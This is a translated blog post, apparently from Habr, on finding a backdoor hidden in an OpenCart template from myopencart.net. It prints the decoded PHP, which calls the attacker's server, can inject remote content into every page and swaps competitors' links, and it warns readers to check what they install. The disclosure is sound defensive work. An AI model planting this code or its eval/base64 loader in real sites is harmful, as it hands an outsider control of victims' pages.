The history of a single template or backdoor from myopencart.net
Foreword
Once I asked a friend to see why he could not install the template on the CMS Opencart .
Sends a link to the site, access to the administrative part and hosting. I go, I see a template in the theme directory ( / catalog / view / theme / ). Having a little understanding of the system structure, I understand that there is no tool for loading templates, as for example, in WordPress. Adding a new theme is loading the necessary files into specific folders. A CMS "learns" about the available templates by scanning the folder with the themes.
So, the solution to the problem was trivial, the template was just incorrectly loaded. In this case, it had to be downloaded from the root of the site.
Decoupling
This would have ended the story, but in the archive there were “extra” files and replacing existing ones not related to the template. And I wondered what was missing, what was needed to be replaced.
Some scripts were added to the controllers, localization files and replaced with /system/library/response.php .
')
The most interesting was the last file, where I found these lines:
base64
$ouput = eval(base64_decode('=')); In the original file, of course, this was not.
After decoding, this naturally turned out to be a backdoor :
function get_page
function get_page($url){ $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9'; $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL,$url ); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch,CURLOPT_VERBOSE,false); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $page=curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); switch($httpcode){ case '200': return $page; break; case '404'; return false; break; } } if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){ $find = array("</body>", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by"); $replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net"); $ouput = str_replace($find, $replace, $ouput); ini_set("display_errors","off"); error_reporting(0); echo $ouput;} else { echo $ouput; } This code not only replaces the links of competitors and the official site, but also allows you to manage the content of the page.
From the above server, the response is returned:
</body></html> But what prevents to return the
So it goes.
Conclusion
To check and confirm my concerns, I went to the official website opencart.com in the "Partners" section. Where is the office. Russian site opencart.ru , in fact , this confirmed that myopencart.net is a phishing site.
Be careful and check what you install!
UPD
Regarding the PHP code, we found out that executing it on the attacked server will fail.
Source: https://habr.com/ru/post/193910/
All Articles